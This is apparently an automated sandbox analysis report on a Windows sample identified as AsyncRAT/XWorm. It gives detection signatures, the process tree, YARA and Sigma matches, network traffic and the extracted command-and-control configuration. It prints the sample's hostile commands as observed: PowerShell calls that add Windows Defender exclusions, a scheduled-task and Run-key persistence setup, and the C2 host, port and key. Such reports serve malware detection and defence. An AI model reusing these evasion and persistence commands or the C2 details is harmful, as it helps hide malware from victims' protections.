Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
kj93GnZHBS.exe

Overview

General Information

Sample name:kj93GnZHBS.exe
renamed because original name is a hash value
Original sample name:d73c8c0df400ad51f19989a2e3a104929b31487992e20612912e3af75bb26ed8.exe
Analysis ID:1583091
MD5:0b489846ad1a6a399ec787e157fd0970
SHA1:d930097ef83e3571d868f0f69d1513024676890d
SHA256:d73c8c0df400ad51f19989a2e3a104929b31487992e20612912e3af75bb26ed8
Tags:exeuser-Chainskilabs
Infos:

Detection

AsyncRAT, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AsyncRAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • kj93GnZHBS.exe (PID: 728 cmdline: "C:\Users\user\Desktop\kj93GnZHBS.exe" MD5: 0B489846AD1A6A399EC787E157FD0970)
    • powershell.exe (PID: 6500 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\kj93GnZHBS.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5944 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'kj93GnZHBS.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5492 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\system log' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5296 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'system log' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 6528 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "system log" /tr "C:\Users\user\AppData\Local\Temp\system log" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 5356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • system log (PID: 5436 cmdline: "C:\Users\user\AppData\Local\Temp\system log" MD5: 0B489846AD1A6A399EC787E157FD0970)
  • OpenWith.exe (PID: 2292 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
  • svchost.exe (PID: 4416 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • OpenWith.exe (PID: 3160 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm
{"C2 url": ["drive-isp.gl.at.plly.gg"], "Port": 56647, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
SourceRuleDescriptionAuthorStrings
kj93GnZHBS.exeJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
    kj93GnZHBS.exeJoeSecurity_XWormYara detected XWormJoe Security
      kj93GnZHBS.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
        kj93GnZHBS.exerat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
        • 0x73c8:$str01: $VB$Local_Port
        • 0x73b9:$str02: $VB$Local_Host
        • 0x7618:$str03: get_Jpeg
        • 0x713b:$str04: get_ServicePack
        • 0x849e:$str05: Select * from AntivirusProduct
        • 0x869a:$str06: PCRestart
        • 0x86ae:$str07: shutdown.exe /f /r /t 0
        • 0x8760:$str08: StopReport
        • 0x8736:$str09: StopDDos
        • 0x882c:$str10: sendPlugin
        • 0x89ac:$str12: -ExecutionPolicy Bypass -File "
        • 0x8ad1:$str13: Content-length: 5235
        kj93GnZHBS.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x83ae:$s6: VirtualBox
        • 0x830c:$s8: Win32_ComputerSystem
        • 0x8d74:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x8e11:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x8f26:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x89ec:$cnc4: POST / HTTP/1.1
        SourceRuleDescriptionAuthorStrings
        C:\Users\user\AppData\Local\Temp\system logJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
          C:\Users\user\AppData\Local\Temp\system logJoeSecurity_XWormYara detected XWormJoe Security
            C:\Users\user\AppData\Local\Temp\system logJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              C:\Users\user\AppData\Local\Temp\system lograt_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
              • 0x73c8:$str01: $VB$Local_Port
              • 0x73b9:$str02: $VB$Local_Host
              • 0x7618:$str03: get_Jpeg
              • 0x713b:$str04: get_ServicePack
              • 0x849e:$str05: Select * from AntivirusProduct
              • 0x869a:$str06: PCRestart
              • 0x86ae:$str07: shutdown.exe /f /r /t 0
              • 0x8760:$str08: StopReport
              • 0x8736:$str09: StopDDos
              • 0x882c:$str10: sendPlugin
              • 0x89ac:$str12: -ExecutionPolicy Bypass -File "
              • 0x8ad1:$str13: Content-length: 5235
              C:\Users\user\AppData\Local\Temp\system logMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0x83ae:$s6: VirtualBox
              • 0x830c:$s8: Win32_ComputerSystem
              • 0x8d74:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0x8e11:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0x8f26:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0x89ec:$cnc4: POST / HTTP/1.1
              SourceRuleDescriptionAuthorStrings
              00000000.00000000.2006908730.0000000000412000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                00000000.00000000.2006908730.0000000000412000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                  00000000.00000000.2006908730.0000000000412000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                  • 0x81ae:$s6: VirtualBox
                  • 0x810c:$s8: Win32_ComputerSystem
                  • 0x8b74:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                  • 0x8c11:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                  • 0x8d26:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                  • 0x87ec:$cnc4: POST / HTTP/1.1
                  00000000.00000002.3270260103.0000000002721000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                    Process Memory Space: kj93GnZHBS.exe PID: 728JoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                      Click to see the 1 entries
                      SourceRuleDescriptionAuthorStrings
                      0.0.kj93GnZHBS.exe.410000.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                        0.0.kj93GnZHBS.exe.410000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                          0.0.kj93GnZHBS.exe.410000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                            0.0.kj93GnZHBS.exe.410000.0.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
                            • 0x73c8:$str01: $VB$Local_Port
                            • 0x73b9:$str02: $VB$Local_Host
                            • 0x7618:$str03: get_Jpeg
                            • 0x713b:$str04: get_ServicePack
                            • 0x849e:$str05: Select * from AntivirusProduct
                            • 0x869a:$str06: PCRestart
                            • 0x86ae:$str07: shutdown.exe /f /r /t 0
                            • 0x8760:$str08: StopReport
                            • 0x8736:$str09: StopDDos
                            • 0x882c:$str10: sendPlugin
                            • 0x89ac:$str12: -ExecutionPolicy Bypass -File "
                            • 0x8ad1:$str13: Content-length: 5235
                            0.0.kj93GnZHBS.exe.410000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                            • 0x83ae:$s6: VirtualBox
                            • 0x830c:$s8: Win32_ComputerSystem
                            • 0x8d74:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                            • 0x8e11:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                            • 0x8f26:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                            • 0x89ec:$cnc4: POST / HTTP/1.1

                            System Summary

                            barindex
                            Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\system log, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\kj93GnZHBS.exe, ProcessId: 728, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\system log
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\kj93GnZHBS.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\kj93GnZHBS.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\kj93GnZHBS.exe", ParentImage: C:\Users\user\Desktop\kj93GnZHBS.exe, ParentProcessId: 728, ParentProcessName: kj93GnZHBS.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\kj93GnZHBS.exe', ProcessId: 6500, ProcessName: powershell.exe
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\system log', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\system log', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\kj93GnZHBS.exe", ParentImage: C:\Users\user\Desktop\kj93GnZHBS.exe, ParentProcessId: 728, ParentProcessName: kj93GnZHBS.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\system log', ProcessId: 5492, ProcessName: powershell.exe
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\system log', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\system log', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\kj93GnZHBS.exe", ParentImage: C:\Users\user\Desktop\kj93GnZHBS.exe, ParentProcessId: 728, ParentProcessName: kj93GnZHBS.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\system log', ProcessId: 5492, ProcessName: powershell.exe
                            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\kj93GnZHBS.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\kj93GnZHBS.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\kj93GnZHBS.exe", ParentImage: C:\Users\user\Desktop\kj93GnZHBS.exe, ParentProcessId: 728, ParentProcessName: kj93GnZHBS.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\kj93GnZHBS.exe', ProcessId: 6500, ProcessName: powershell.exe
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\system log, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\kj93GnZHBS.exe, ProcessId: 728, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\system log
                            Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\Temp\system log", CommandLine: "C:\Users\user\AppData\Local\Temp\system log", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\system log, NewProcessName: C:\Users\user\AppData\Local\Temp\system log, OriginalFileName: C:\Users\user\AppData\Local\Temp\system log, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\system log", ProcessId: 5436, ProcessName: system log
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\kj93GnZHBS.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\kj93GnZHBS.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\kj93GnZHBS.exe", ParentImage: C:\Users\user\Desktop\kj93GnZHBS.exe, ParentProcessId: 728, ParentProcessName: kj93GnZHBS.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\kj93GnZHBS.exe', ProcessId: 6500, ProcessName: powershell.exe
                            Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\kj93GnZHBS.exe, ProcessId: 728, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system log.lnk
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "system log" /tr "C:\Users\user\AppData\Local\Temp\system log", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "system log" /tr "C:\Users\user\AppData\Local\Temp\system log", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\kj93GnZHBS.exe", ParentImage: C:\Users\user\Desktop\kj93GnZHBS.exe, ParentProcessId: 728, ParentProcessName: kj93GnZHBS.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "system log" /tr "C:\Users\user\AppData\Local\Temp\system log", ProcessId: 6528, ProcessName: schtasks.exe
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\kj93GnZHBS.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\kj93GnZHBS.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\kj93GnZHBS.exe", ParentImage: C:\Users\user\Desktop\kj93GnZHBS.exe, ParentProcessId: 728, ParentProcessName: kj93GnZHBS.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\kj93GnZHBS.exe', ProcessId: 6500, ProcessName: powershell.exe
                            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 4416, ProcessName: svchost.exe
                            No Suricata rule has matched

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Source: kj93GnZHBS.exeAvira: detected
                            Source: C:\Users\user\AppData\Local\Temp\system logAvira: detection malicious, Label: TR/Spy.Gen
                            Source: kj93GnZHBS.exeMalware Configuration Extractor: Xworm {"C2 url": ["drive-isp.gl.at.plly.gg"], "Port": 56647, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
                            Source: C:\Users\user\AppData\Local\Temp\system logReversingLabs: Detection: 81%
                            Source: kj93GnZHBS.exeVirustotal: Detection: 68%Perma Link
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                            Source: C:\Users\user\AppData\Local\Temp\system logJoe Sandbox ML: detected
                            Source: kj93GnZHBS.exeJoe Sandbox ML: detected
                            Source: kj93GnZHBS.exeString decryptor: drive-isp.gl.at.plly.gg
                            Source: kj93GnZHBS.exeString decryptor: 56647
                            Source: kj93GnZHBS.exeString decryptor: <123456789>
                            Source: kj93GnZHBS.exeString decryptor: <Xwormmm>
                            Source: kj93GnZHBS.exeString decryptor: lolololol
                            Source: kj93GnZHBS.exeString decryptor: USB.exe
                            Source: kj93GnZHBS.exeString decryptor: %Temp%
                            Source: kj93GnZHBS.exeString decryptor: system log
                            Source: kj93GnZHBS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: kj93GnZHBS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                            Networking

                            barindex
                            Source: Malware configuration extractorURLs: drive-isp.gl.at.plly.gg
                            Source: Yara matchFile source: kj93GnZHBS.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.kj93GnZHBS.exe.410000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\system log, type: DROPPED
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                            Source: unknownDNS query: name: ip-api.com
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: global trafficDNS traffic detected: DNS query: ip-api.com
                            Source: global trafficDNS traffic detected: DNS query: drive-isp.gl.at.plly.gg
                            Source: powershell.exe, 00000008.00000002.2429348141.000001D47F770000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                            Source: svchost.exe, 00000011.00000002.3267865139.000001FE85600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                            Source: qmgr.db.17.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                            Source: qmgr.db.17.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                            Source: qmgr.db.17.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                            Source: qmgr.db.17.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                            Source: qmgr.db.17.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                            Source: qmgr.db.17.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                            Source: qmgr.db.17.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                            Source: kj93GnZHBS.exe, 00000000.00000002.3270260103.0000000002721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                            Source: kj93GnZHBS.exe, system log.0.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                            Source: powershell.exe, 00000002.00000002.2113954304.000001DFAF182000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2237067429.00000191DDC52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2398730620.000001D410071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2618644904.00000166D8A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                            Source: powershell.exe, 0000000A.00000002.2484241631.00000166C8BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2654881780.00000166E1100000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                            Source: powershell.exe, 00000002.00000002.2088403420.000001DF9F339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2161987113.00000191CDE0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2293752624.000001D400229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2484241631.00000166C8BE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: kj93GnZHBS.exe, 00000000.00000002.3270260103.0000000002721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2088403420.000001DF9F111000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2161987113.00000191CDBE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2293752624.000001D400001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2484241631.00000166C89C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
